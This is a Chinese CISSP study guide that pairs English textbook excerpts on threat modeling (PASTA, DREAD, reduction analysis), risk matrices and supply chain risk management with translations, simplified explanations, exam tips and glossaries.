资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P118

威胁建模与威胁狩猎

建模偏设计前预判,狩猎偏运行中主动找证据。

教材原文段落

Stage II: Definition of the Technical Scope (DTS) Stage III: Application Decomposition and Analysis (ADA) Stage IV: Threat Analysis (TA) Stage V: Weakness and Vulnerability Analysis (WVA) Stage VI: Attack Modeling & Simulation (AMS) Stage VII: Risk Analysis & Management (RAM) Each stage of PASTA has specific objectives to achieve and deliverables to produce in order to complete the stage. Visual, Agile, and Simple Threat (VAST) is a threat modeling concept that integrates threat and risk management into an Agile programming environment on a scalable basis (see Chapter 20, “Software Development Security,” regarding Agile).

These are just a few in the vast array of threat modeling concepts and methodologies available from community groups, commercial entities, government agencies, and international associations. Be Alert for Individual Threats Competition is often a key part of business growth, but overly adversarial competition can increase the threat level from individuals. In addition to criminal hackers and disgruntled employees, adversaries, contractors, employees, and even trusted partners can be a threat to an organization if relationships go sour. Potential threats to your business are broad and varied. A company faces threats from nature, technology, and people.

Always consider the best and worst possible outcomes of your organization's activities, decisions, and interactions. Identifying threats is the first step toward designing defenses to help reduce or eliminate downtime, compromise, and loss. Determining and Diagramming Potential Attacks The next step in threat modeling is to determine the potential attack concepts that could be realized. This is often accomplished through the creation of a diagram of the elements involved in a transaction, along with indications of

中文直译 / 整理

第二阶段:技术范围定义(DTS) 第三阶段:应用分解与分析(ADA) 第四阶段:威胁分析(TA) 第五阶段:弱点与漏洞分析(WVA) 第六阶段:攻击建模与仿真(AMS) 第七阶段:风险分析与管理(RAM) PASTA的每个阶段都有特定的目标和交付成果,以完成该阶段。 视觉化、敏捷与简易威胁模型(VAST)是一种将威胁与风险管理以可扩展 方式整合到敏捷编程环境中的威胁建模概念(参见第20章,“软件开发安 全”,了解有关敏捷的内容)。 这些只是来自社区团体、商业实体、政府机构和国际组织的众多威胁建 模概念和方法中的一小部分。 警惕个体威胁 竞争通常是业务增长的关键部分,但过度对抗性的竞争会增加来自个人的 威胁水平。 除了犯罪黑客和不满的员工外,如果关系恶化,竞争对手、承 包商、员工甚至受信任的合作伙伴都可能对组织构成威胁。 对您的业务构成的潜在威胁广泛而多样。 企业面临的威胁来自自然、技术和人 员。 始终考虑您组织的活动、决策和互动可能带来的最好和最坏结果。 识别威 胁是设计防御措施以减少或消除停机、泄露和损失的第一步。 确定并绘制潜在攻击图 威胁建模的下一步是确定可能实现的潜在攻击概念。

这通常通过创建涉及交易 的各个元素的图表来完成,并标示出

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:建模偏设计前预判,狩猎偏运行中主动找证据。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

PASTA:PASTA 是七阶段、风险中心的威胁建模方法。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模与威胁狩猎”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

越早做威胁建模,修复成本越低。

PASTA 强调业务目标、技术范围、攻击模拟和风险分析。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
PASTA PASTA 是七阶段、风险中心的威胁建模方法。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P119

威胁建模与威胁狩猎

建模偏设计前预判,狩猎偏运行中主动找证据。

教材原文段落

data flow and privilege boundaries. Figure 1.4 shows each major component of a system, the boundaries between security zones, and the potential flow or movement of information and data. FIGURE 1.4 An example of diagramming to reveal threat concerns This is a high-level overview and not a detailed evaluation of the coding logic. However, for more complex systems, multiple diagrams may need to be created at various focus points and at varying levels of detail magnification. Once a diagram has been crafted, identify all of the technologies involved. Next, identify attacks that could be targeted at each element of the diagram.

Keep in mind that all forms of attacks should be considered, including logical/technical, physical, and social. This process will quickly lead you into the next phase of threat modeling: reduction analysis. Performing Reduction Analysis The next step in threat modeling is to perform a reduction analysis. Reduction analysis is also known as decomposing the application, system, or environment. The purpose of this task is to gain a greater understanding of the logic of the product, its internal components, as well as its interactions

中文直译 / 整理

数据流和权限边界。 图 1.4 显示了系统的每个主要组件、安全区域之间的边界, 以及信息和数据的潜在流动或转移。 图 1.4 用于揭示威胁关切的图示示例 这是高层级的概览,并非对编码逻辑的详细评估。 然而,对于更复杂的系统, 可能需要在不同的关注点上创建多个图示,并以不同的详细程度进行放大。 一旦完成图示,需识别其中涉及的所有技术。 接着,识别可能针对图示中每个 元素的攻击方式。 请记住,应考虑所有形式的攻击,包括逻辑/技术性、物理 性和社会性攻击。 这一过程将迅速引导您进入威胁建模的下一阶段:缩减分析。 执行缩减分析 威胁建模的下一步是执行缩减分析。 简化分析也称为分解应用程序、系统或环境。 此任务的目的是更深入地理解产 品的逻辑、其内部组件以及它们之间的交互

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:建模偏设计前预判,狩猎偏运行中主动找证据。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模与威胁狩猎”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

越早做威胁建模,修复成本越低。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 43 / PDF P120

威胁建模方法:PASTA、STRIDE、DREAD

分类、建模、评分、优先级是不同层次。

教材原文段落

with external elements. Whether an application, a system, or an entire environment, it needs to be divided into smaller containers or compartments. Those might be subroutines, modules, or objects if you're focusing on software, computers, or operating systems; they might be protocols if you're focusing on systems or networks; or they might be departments, tasks, and networks if you're focusing on an entire business infrastructure. Each identified element should be evaluated in order to understand inputs, processing, security, data management, storage, and outputs.

In the decomposition process, you must identify five key concepts: Trust Boundaries Any location where the level of trust or security changes Dataflow Paths The movement of data between locations Input Points Locations where external input is received Privileged Operations Any activity that requires greater privileges than a standard user account or process typically required to make system changes or alter security Details about Security Stance and Approach The declaration of the security policy, security foundations, and security assumptions Breaking down a system into its constituent parts makes it much easier to identify the essential components of each element as well as take notice of vulnerabilities and points of attack.

The more you understand exactly how a program, system, or environment operates, the easier it is to identify threats to it. Once threats are identified, they should be fully documented by defining the means, target, and consequences of a threat. Consider including the techniques required to implement an exploitation and list potential countermeasures and safeguards. Prioritization and Response After documentation, the next step is to rank or rate the threats. This can be accomplished using a wide range of techniques, such as Probability × Damage Potential ranking, high/medium/low rating, or the DREAD system.

The ranking technique of Probability × Damage Potential produces a risk severity number on a scale of 1 to 100, with 100 being the most severe risk

中文直译 / 整理

与外部元素的交互。 无论是应用程序、系统还是整个环境,都需要将其划分为 更小的容器或 compartment。 如果关注的是软件、计算机或操作系统,这些 可能是子程序、模块或对象; 如果关注的是系统或网络,可能是协议; 如果关 注的是整个业务基础设施,则可能是部门、任务和网络。 每个识别出的元素都 应进行评估,以了解输入、处理、安全、数据管理、存储和输出。 在分解过程中,您必须识别五个关键概念: 信任边界 信任或安全级别发生变化的任何位置 数据流路径 数据在不同位置之间的移动 输入点 接收外部输入的位置 特权操作 任何需要比标准用户账户或进程更高权限的活动,通常用于执 行系统更改或修改安全设置 关于安全立场和方法的详细信息 声明 安全策略、安全基础和安全假设 将系统分解为其组成部分,有助于更轻松地识别每个元素的关键组件,同时注 意到漏洞和攻击点。 您对程序、系统或环境的运作方式理解得越深入,就越容 易识别其面临的威胁。 一旦识别出威胁,应通过定义威胁的手段、目标和后果来全面记录。 建议包括 实施攻击所需的技术,并列出潜在的应对措施和防护手段。 优先级与响应 完成文档后,下一步是对威胁进行排序或评级。

这可以通过多种技术实现,例 如概率× 损害潜力评级、高/中/低评级,或DREAD系统。 通过概率× 损害潜力的排名技术,生成一个介于1到100之间的风险严重性数值, 其中100表示最严重的风险。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:分类、建模、评分、优先级是不同层次。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

DREAD:DREAD 用五个维度给威胁打分。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模方法:PASTA、STRIDE、DREAD”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

DREAD 是风险评分方法,不是威胁类别。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
DREAD DREAD 用五个维度给威胁打分。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 44 / PDF P121

威胁建模方法:PASTA、STRIDE、DREAD

分类、建模、评分、优先级是不同层次。

教材原文段落

possible. Each of the two initial values can be assigned numbers between 1 and 10, with 1 being the lowest and 10 the highest. These rankings can be somewhat arbitrary and subjective, but since the same person or team will be assigning the numbers for their own organization, it should still result in assessment values that are accurate on a relative basis. The high/medium/low (1/2/3 or green/yellow/red) rating process is even simpler. It creates a basic risk matrix or heat map (Figure 1.5). As with any means of risk assessment, the purpose is to help establish criticality prioritization. When using a risk matrix, each threat can be assigned a probability and a damage potential level.

Then, when these two values are compared, the result is a combined value somewhere in the nine squares. Those threats in the HH (high probability/high damage potential) area are of the highest priority and concern, whereas those in the LL (low probability/low damage potential) area are of the least priority and concern.

中文直译 / 整理

可能。 这两个初始值均可赋予1到10之间的数字,其中1为最低,10为最高。 这 些排名可能有些任意和主观,但由于同一人或团队将为其所在组织分配这些数 字,因此仍应得出相对准确的评估值。 高/中/低(1/2/3 或绿色/黄色/红色)评级过程更加简单。 它创建了一个基本的 风险矩阵或热力图(图 1.5)。 与任何风险评估方法一样,其目的是帮助确定 优先级。 使用风险矩阵时,每个威胁都可以被分配一个概率和一个损害潜力等 级。 然后,当这两个值进行比较时,结果会落在九个格子中的某个位置。 位于 HH(高概率/高损害潜力)区域的威胁具有最高优先级和最需关注,而位于 LL(低概率/低损害潜力)区域的威胁则优先级最低、最不需关注。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:分类、建模、评分、优先级是不同层次。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模方法:PASTA、STRIDE、DREAD”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 45 / PDF P122

威胁建模方法:PASTA、STRIDE、DREAD

分类、建模、评分、优先级是不同层次。

教材原文段落

FIGURE 1.5 A risk matrix or risk heat map The Damage, Reproducibility, Exploitability, Affected Users, and Discoverability (DREAD) rating system is designed to provide a flexible rating solution that is based on the answers to five main questions about each threat: Damage (potential) How severe is the damage likely to be if the threat is realized? Reproducibility How complicated is it for attackers to reproduce the exploit? Exploitability How hard is it to perform the attack?

中文直译 / 整理

图 1.5 风险矩阵或风险热力图 该损害、可重现性、可利用性、受影响用户和可发现性(DREAD)评分系统旨 在提供一种灵活的评分解决方案,该方案基于对每个威胁的五个主要问题的回 答: 损害(潜在) 如果威胁实现,损害可能有多严重? 可重现性 攻击者重现该 漏洞的复杂程度如何? 可利用性 执行该攻击的难度如何?

小白解释

场景先行:你是公司的安全负责人,正在读第 122 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:分类、建模、评分、优先级是不同层次。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

DREAD:DREAD 用五个维度给威胁打分。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模方法:PASTA、STRIDE、DREAD”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

DREAD 是风险评分方法,不是威胁类别。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
DREAD DREAD 用五个维度给威胁打分。
学习单元 46 / PDF P123

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Affected Users How many users are likely to be affected by the attack (as a percentage)? Discoverability How hard is it for an attacker to discover the weakness? Once threat priorities are set, responses to those threats need to be determined. Technologies and processes to remediate threats should be considered and weighted according to their cost and effectiveness. Response options should include making adjustments to software architecture, altering operations and processes, and implementing defensive and detection components. This process is similar to the risk assessment process discussed in Chapter 2.

The difference is that threats are the focus of threat modeling, whereas assets are often the focus of risk assessment. Supply Chain Risk Management Applying risk-based management concepts to the supply chain is a means to ensure a more robust and successful security strategy in organizations of all sizes. A supply chain is the concept that most computers, devices, networks, systems, and even cloud services are not built by a single entity. In fact, most of the companies we know of as computer and equipment manufacturers generally perform the final assembly rather than manufacture all the individual components.

Often, the CPU, memory, drive controllers, hard drives, SSDs, and video cards are created by other third-party vendors. Even these commodity vendors are unlikely to have mined their own metals, processed the oil for plastics, or etched the silicon of their chips. Thus, any finished system has a long and complex history, known as its supply chain, that enabled it to come into existence. Supply chain risk management (SCRM) is the means to ensure that all of the vendors or links in the supply chain are reliable, trustworthy, reputable organizations that disclose their practices and security requirements to their business partners (although not necessarily to the public).

SCRM should be evaluated for every organizational acquisition of products and services from third-party suppliers and providers. Each link in a supply chain should be responsible and accountable to the next link in the chain. Each handoff should be properly organized, documented,

中文直译 / 整理

受影响用户 受该攻击影响的用户比例大概是多少? 可发现性 攻击者发现该弱点的难度有多大? 一旦确定了威胁优先级,就需要确定应对这些威胁的措施。 应根据成本和有效 性,对用于消除威胁的技术和流程进行评估和权衡。 应对选项应包括调整软件 架构、改变操作和流程,以及实施防御和检测组件。 此过程类似于第2章中讨论的风险评估过程。 区别在于,威胁建模以威胁为焦点, 而风险评估通常以资产为焦点。 供应链风险管理 将基于风险的管理概念应用于供应链,是确保各类组织实现更稳健、更成功安 全策略的一种手段。 供应链是指大多数计算机、设备、网络、系统甚至云服务 并非由单一实体构建的概念。 事实上,我们所熟知的大多数计算机和设备制造 商通常仅负责最终组装,而非制造所有独立组件。 通常,CPU、内存、驱动控 制器、硬盘、SSD和显卡均由其他第三方供应商制造。 即使这些大宗商品供应 商也极不可能自行开采金属、加工塑料用石油或蚀刻芯片中的硅。 因此,任何 成品系统都拥有一个漫长而复杂的制造历史,即其供应链,正是这一供应链使 其得以诞生。

供应链风险管理(SCRM) 是确保供应链中的所有供应商或环节均为可靠、可 信、有声誉的组织,并向其业务合作伙伴披露其实践和安全要求(尽管不一定 向公众披露)的手段。 对于组织从第三方供应商和提供商处采购产品和服务时, 应评估SCRM。 供应链中的每个环节都应对下一个环节负责并承担责任。 每次交接都应得到妥善组 织、记录、

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

供应链风险管理:SCRM 管理供应商、硬件、软件、服务和交付链条的风险。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

越早做威胁建模,修复成本越低。

外包、供应商、硬件篡改、假冒、植入、SBOM 都是 SCRM 场景。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
供应链风险管理 SCRM 管理供应商、硬件、软件、服务和交付链条的风险。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 47 / PDF P124

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

managed, and audited. The goal of a secure supply chain is to ensure that the finished product is of sufficient quality, meets performance and operational goals, and provides stated security mechanisms. And, at no point in the process was any element subjected to unauthorized or malicious manipulation or sabotage. When evaluating organizational risk, consider external factors that can affect the organization, especially related to company stability and resource availability.

The supply chain can be a threat vector, where materials, software, hardware, or data are being obtained from a supposedly trusted source, but the supply chain behind that source could have been compromised and the asset poisoned or modified. An organization's supply chain should be assessed to determine what risks it places on the organization. Is the organization operating on a just-in-time basis where materials are delivered just before or just as they are needed by manufacturing? If there is any delay in delivery, does the organization have access to any surplus or buffer of materials that can be used to maintain production while the supply chain operations are reconstituted?

Most organizations rely on products manufactured by other entities. Most of those products are produced as part of a long and complex supply chain. Attacks on that supply chain could result in flawed or less reliable products or could allow for remote access or listening mechanisms to be embedded into otherwise functioning equipment. Supply chain attacks include product tampering, counterfeits, and even implants. Supply chain attacks present a risk that can be challenging to address. An organization may elect to inspect all equipment in order to reduce the chance of modified devices going into production networks.

However, with miniaturization, it may be nearly impossible to discover an extra chip placed on a device's mainboard. Also, the manipulation may be through firmware or software instead of hardware. Organizations can choose to source products from trusted and reputable vendors or attempt to use vendors who manufacture most of their products domestically. In many cases, ongoing security monitoring, management, and assessment may be required. This could be an industry best practice or a regulation. Such assessment and monitoring of a supply chain may be performed by the primary or end-of-chain organization or may require the use of external auditors.

When engaging third-party assessment and monitoring services, keep in mind that each element of the supply chain entity needs to show

中文直译 / 整理

管理和审计。 安全供应链的目标是确保最终产品具有足够的质量,满足性能和 运营目标,并提供声明的安全机制。 在整个过程中,任何环节均未遭受未经授 权或恶意的篡改或破坏。 在评估组织风险时,应考虑可能影响组织的外部因素,特别是与公司稳定性和 资源可用性相关的因素。 供应链可能成为威胁向量,即材料、软件、硬件或数 据从一个看似可信的来源获取,但该来源背后的供应链可能已被破坏,导致资 产被污染或修改。 应评估组织的供应链,以确定其对组织带来的风险。 该组织是否采用准时制运 营,即材料在制造所需前或所需时才交付? 如果交付出现任何延迟,组织是否 能够获得多余的或缓冲的材料,以在供应链恢复期间维持生产? 大多数组织依赖其他实体制造的产品。 这些产品大多是在漫长而复杂的供应链 中生产的。 对供应链的攻击可能导致产品存在缺陷或可靠性降低,也可能在原 本正常运行的设备中嵌入远程访问或监听机制。 供应链攻击包括产品篡改、假 冒产品,甚至植入物。 供应链攻击带来了一种难以应对的风险。 组织可能会选择检查所有设备,以降 低经过修改的设备进入生产网络的可能性。 然而,随着设备小型化,几乎不可 能发现安装在设备主板上的额外芯片。

此外,篡改可能通过固件或软件而非硬 件进行。 组织可以选择从可信且声誉良好的供应商处采购产品,或尝试使用主 要在国内制造产品的供应商。 在许多情况下,可能需要持续的安全监控、管理和评估。 这可能是行业最佳实 践或法规要求。 对供应链的此类评估和监控可由链主或终端组织执行,也可能 需要使用外部审计师。 在聘请第三方评估和监控服务时,请记住供应链实体的 每个环节都需要展示

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 48 / PDF P125

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

security-mindedness in their business operations. If an organization is unable to manage their own operations on a secure basis, how can they provide reliable security management functions to the supply chain? When possible, establish minimum security requirements for each entity in a supply chain. The security requirements for new hardware, software, or services should always meet or exceed the security expected in the final product. This often requires a detailed review of SLAs, contracts, and actual performance. This is to ensure that security is a prescribed component of the contracted services.

When a supply chain component provider is crafting software or providing a service (such as a cloud provider), then a service-level requirement (SLR) may need to be defined. Often, an SLR is provided by the customer/client prior to the establishment of the SLA (which should incorporate the elements of the SLR if the vendor expects the customer to sign the agreement). SCRM may require the integration of numerous security mechanisms, including silicon root of trust, physically unclonable functions (PUFs), and/or a software bill of materials (SBOM).

A silicon root of trust (RoT), also known as a hardware root of trust, is a foundational and tamper-resistant component within a computer's hardware that provides a secure starting point for establishing trust and security in a system. The primary purpose of a silicon RoT is to ensure the integrity, authenticity, and confidentiality of the system's boot process and software. A silicon RoT can be an essential element of an SCRM plan. Key characteristics of a silicon RoT include: Tamper resistance: The silicon RoT is typically implemented in a way that makes it extremely difficult to tamper with or compromise.

This may involve using dedicated hardware security modules, secure enclaves, or other techniques to protect it from physical and software attacks. Secure boot: A silicon RoT supports a secure boot process. It verifies the integrity of the firmware, bootloader, and operating system during the boot sequence to ensure that no unauthorized or malicious code is executed. Cryptographic operations: The silicon RoT typically has built-in cryptographic capabilities, allowing it to perform operations such as digital signatures, encryption, and decryption. This is essential for

中文直译 / 整理

其业务运营中的安全意识。 如果一个组织无法以安全的方式管理自身的运营, 又如何能为供应链提供可靠的安全管理功能? 在可能的情况下,为供应链中的每个实体建立最低安全要求。 新硬件、软件或 服务的安全要求应始终达到或超过最终产品所预期的安全水平。 这通常需要对 服务等级协议(SLA)、合同和实际性能进行详细审查,以确保安全是合同服 务的明确规定组成部分。 当供应链组件提供商开发软件或提供服务(例如云提 供商)时,可能需要定义服务级别要求(SLR)。 通常,客户/客户端会在建立 SLA之前提供SLR(如果供应商期望客户签署协议,则SLA应包含SLR的要素)。 SCRM 可能需要集成多种安全机制,包括硅信任根、物理不可克隆功能( PUFs)和/或软件材料清单(SBOM)。 一个 硅信任根(RoT),也称为硬件信任根,是计算机硬件中一个基础且防篡 改的组件,它为建立系统中的信任和安全提供了安全的起点。 硅信任根的主要 目的是确保系统启动过程和软件的完整性、真实性和机密性。 硅信任根可以是 SCRM计划中的一个关键要素。 硅根信任(RoT)的关键特征包括: 防篡改性:硅根信任通常以一种使其极难被篡改或破坏的方式实现。

这可 能涉及使用专用硬件安全模块、安全飞地或其他技术,以保护其免受物理 和软件攻击。 安全启动:硅根信任支持安全启动过程。 它在启动序列中验证固件、引导 加载程序和操作系统的完整性,以确保不会执行任何未经授权或恶意的代 码。 加密操作:硅基可信根通常内置加密功能,能够执行数字签名、加密 和解密等操作。 这对于

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

授权:授权是认证之后决定你能访问什么、能做什么。

